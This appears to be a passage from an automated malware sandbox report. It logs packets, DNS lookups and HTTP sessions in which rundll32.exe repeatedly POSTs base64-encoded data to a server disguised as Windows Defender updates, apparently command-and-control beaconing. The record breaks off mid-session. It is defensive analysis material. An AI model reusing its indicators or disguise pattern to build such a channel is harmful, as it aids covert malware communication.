                                              Dec 6, 2024 22:20:46.065643072 CET497824443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:46.071949959 CET44349780185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:46.071968079 CET44349780185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:46.072026014 CET49780443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:46.072048903 CET44349780185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:46.072069883 CET49780443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:46.072089911 CET49780443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:46.086730957 CET44349780185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:46.086750031 CET44349780185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:46.086811066 CET49780443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:46.086827993 CET44349780185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:46.086869001 CET49780443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:46.093045950 CET44349780185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:46.093064070 CET44349780185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:46.093231916 CET49780443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:46.093240976 CET44349780185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:46.093287945 CET49780443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:46.166901112 CET44349780185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:46.166920900 CET44349780185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:46.167001963 CET49780443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:46.167032003 CET44349780185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:46.167068958 CET49780443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:46.172920942 CET44349780185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:46.172945023 CET44349780185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:46.172986031 CET49780443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:46.172995090 CET44349780185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:46.173018932 CET49780443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:46.173033953 CET49780443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:46.178452015 CET44349780185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:46.178474903 CET44349780185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:46.178514957 CET49780443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:46.178527117 CET44349780185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:46.178550005 CET49780443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:46.178569078 CET49780443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:46.184577942 CET44349780185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:46.184597015 CET44349780185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:46.184639931 CET49780443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:46.184653044 CET44349780185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:46.184674025 CET49780443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:46.184685946 CET49780443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:46.186506033 CET444349782185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:46.186563015 CET497824443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:46.203362942 CET497874443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:46.241692066 CET44349780185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:46.241709948 CET44349780185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:46.241786003 CET49780443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:46.241812944 CET44349780185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:46.241854906 CET49780443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:46.264461040 CET44349780185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:46.264480114 CET44349780185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:46.264585018 CET49780443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:46.264621019 CET44349780185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:46.264669895 CET49780443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:46.279037952 CET44349780185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:46.279059887 CET44349780185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:46.279165983 CET49780443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:46.279198885 CET44349780185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:46.279244900 CET49780443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:20:46.284102917 CET44349780185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:46.284122944 CET44349780185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:20:46.284214020 CET49780443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:26.192174911 CET444349891185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:26.192420959 CET498914443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:26.295922041 CET498954443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:26.416107893 CET444349895185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:26.416177988 CET498954443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:26.417602062 CET498954443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:26.537514925 CET444349895185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:27.990735054 CET444349895185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:27.993623018 CET498954443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:28.115586996 CET444349895185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:28.116265059 CET498954443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:28.123572111 CET499014443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:28.246088028 CET444349901185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:28.246284008 CET499014443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:28.247754097 CET499014443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:28.369724989 CET444349901185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:29.766406059 CET444349901185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:29.768074036 CET499014443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:29.888292074 CET444349901185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:29.888362885 CET499014443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:29.917454958 CET499064443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:30.039367914 CET444349906185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:30.039454937 CET499064443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:30.041013956 CET499064443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:30.160902977 CET444349906185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:31.503984928 CET444349906185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:31.505597115 CET499064443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:31.627563000 CET444349906185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:31.627620935 CET499064443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:31.646811962 CET499104443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:31.766736984 CET444349910185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:31.766822100 CET499104443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:31.768332005 CET499104443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:31.888309956 CET444349910185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:33.298293114 CET444349910185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:33.300085068 CET499104443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:33.420185089 CET444349910185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:33.420270920 CET499104443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:33.439543962 CET499124443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:33.560667992 CET444349912185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:33.560862064 CET499124443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:33.562880039 CET499124443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:33.682770014 CET444349912185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:35.027105093 CET444349912185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:35.028640985 CET499124443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:35.148940086 CET444349912185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:35.149007082 CET499124443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:35.173347950 CET499174443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:35.293036938 CET444349917185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:35.293124914 CET499174443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:35.294671059 CET499174443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:35.415498018 CET444349917185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:36.738509893 CET444349917185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:36.740200043 CET499174443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:36.860483885 CET444349917185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:36.860570908 CET499174443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:36.876554012 CET499224443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:36.996489048 CET444349922185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:36.996583939 CET499224443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:36.998045921 CET499224443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:37.118012905 CET444349922185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:41.590828896 CET444349922185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:41.595289946 CET499224443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:41.715351105 CET444349922185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:41.715403080 CET499224443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:41.735939980 CET499324443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:41.855721951 CET444349932185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:41.855803967 CET499324443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:41.857400894 CET499324443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:41.977207899 CET444349932185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:43.273221970 CET49938443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:43.273277044 CET44349938185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:43.273485899 CET49938443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:43.285878897 CET49938443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:43.285896063 CET44349938185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:43.296139956 CET444349932185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:43.301651955 CET499324443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:43.424221992 CET444349932185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:43.428210974 CET499324443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:43.436979055 CET499394443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:43.556710005 CET444349939185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:43.557110071 CET499394443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:43.558464050 CET499394443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:43.678301096 CET444349939185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:44.831145048 CET44349938185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:44.831262112 CET49938443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:45.104841948 CET444349939185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:45.109823942 CET499394443192.168.2.4185.234.216.175
                                              Dec 6, 2024 22:21:45.234509945 CET444349939185.234.216.175192.168.2.4
                                              Dec 6, 2024 22:21:45.234565973 CET499394443192.168.2.4185.234.216.175
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 6, 2024 22:19:35.483716965 CET | 55315 | 53 | 192.168.2.4 | 1.1.1.1
Dec 6, 2024 22:19:35.625550032 CET | 53 | 55315 | 1.1.1.1 | 192.168.2.4
Dec 6, 2024 22:19:39.979700089 CET | 58221 | 53 | 192.168.2.4 | 1.1.1.1
Dec 6, 2024 22:19:40.118748903 CET | 53 | 58221 | 1.1.1.1 | 192.168.2.4
Dec 6, 2024 22:20:04.463222980 CET | 63193 | 53 | 192.168.2.4 | 1.1.1.1
Dec 6, 2024 22:20:04.602116108 CET | 53 | 63193 | 1.1.1.1 | 192.168.2.4
Dec 6, 2024 22:21:07.772567987 CET | 57298 | 53 | 192.168.2.4 | 1.1.1.1
Dec 6, 2024 22:21:08.400990963 CET | 53 | 57298 | 1.1.1.1 | 192.168.2.4
Dec 6, 2024 22:21:43.129338026 CET | 53964 | 53 | 192.168.2.4 | 1.1.1.1
Dec 6, 2024 22:21:43.267827034 CET | 53 | 53964 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 6, 2024 22:19:35.483716965 CET | 192.168.2.4 | 1.1.1.1 | 0x2af3 | Standard query (0) | axizlhop.life | A (IP address) | IN (0x0001) | false
Dec 6, 2024 22:19:39.979700089 CET | 192.168.2.4 | 1.1.1.1 | 0x5aa8 | Standard query (0) | security-patches.systems | A (IP address) | IN (0x0001) | false
Dec 6, 2024 22:20:04.463222980 CET | 192.168.2.4 | 1.1.1.1 | 0xae17 | Standard query (0) | security-patches.systems | A (IP address) | IN (0x0001) | false
Dec 6, 2024 22:21:07.772567987 CET | 192.168.2.4 | 1.1.1.1 | 0x6476 | Standard query (0) | security-patches.systems | A (IP address) | IN (0x0001) | false
Dec 6, 2024 22:21:43.129338026 CET | 192.168.2.4 | 1.1.1.1 | 0xdb6b | Standard query (0) | security-patches.systems | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 6, 2024 22:19:35.625550032 CET | 1.1.1.1 | 192.168.2.4 | 0x2af3 | No error (0) | axizlhop.life | | 104.21.40.3 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 22:19:35.625550032 CET | 1.1.1.1 | 192.168.2.4 | 0x2af3 | No error (0) | axizlhop.life | | 172.67.172.216 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 22:19:40.118748903 CET | 1.1.1.1 | 192.168.2.4 | 0x5aa8 | No error (0) | security-patches.systems | | 185.234.216.175 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 22:20:04.602116108 CET | 1.1.1.1 | 192.168.2.4 | 0xae17 | No error (0) | security-patches.systems | | 185.234.216.175 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 22:21:08.400990963 CET | 1.1.1.1 | 192.168.2.4 | 0x6476 | No error (0) | security-patches.systems | | 185.234.216.175 | A (IP address) | IN (0x0001) | false
Dec 6, 2024 22:21:43.267827034 CET | 1.1.1.1 | 192.168.2.4 | 0xdb6b | No error (0) | security-patches.systems | | 185.234.216.175 | A (IP address) | IN (0x0001) | false
                                              • axizlhop.life
                                              • security-patches.systems
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49740 | 185.234.216.175 | 4443 | 1908 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 22:20:04.737658024 CET | 741 | OUT | POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 525
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
Dec 6, 2024 22:20:06.201527119 CET | 218 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:05 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49741 | 185.234.216.175 | 4443 | 1908 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 22:20:06.365020990 CET | 461 | OUT | POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:20:07.810081005 CET | 218 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:07 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49742 | 185.234.216.175 | 4443 | 1908 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 22:20:08.075721025 CET | 461 | OUT | POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:20:09.544920921 CET | 218 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:09 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49743 | 185.234.216.175 | 4443 | 1908 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 22:20:09.812864065 CET | 461 | OUT | POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:20:11.274260998 CET | 218 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:10 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49744 | 185.234.216.175 | 4443 | 1908 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 22:20:11.531900883 CET | 461 | OUT | POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:20:13.011755943 CET | 218 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:12 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49745 | 185.234.216.175 | 4443 | 1908 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Dec 6, 2024 22:20:13.302762032 CET | 461 | OUT | POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:20:14.785376072 CET | 218 | IN | HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:14 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.449746185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp   Bytes transferred   Direction   Data
                                              Dec 6, 2024 22:20:15.071516037 CET   461   OUT   POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:16.568165064 CET   218   IN   HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:16 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.449747185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp   Bytes transferred   Direction   Data
                                              Dec 6, 2024 22:20:16.825575113 CET   461   OUT   POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:18.258492947 CET   218   IN   HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:17 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.449748185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp   Bytes transferred   Direction   Data
                                              Dec 6, 2024 22:20:18.513912916 CET   461   OUT   POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:19.962135077 CET   218   IN   HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:19 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.449749185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              Timestamp   Bytes transferred   Direction   Data
                                              Dec 6, 2024 22:20:20.236934900 CET   461   OUT   POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:21.682352066 CET   218   IN   HTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:21 GMT
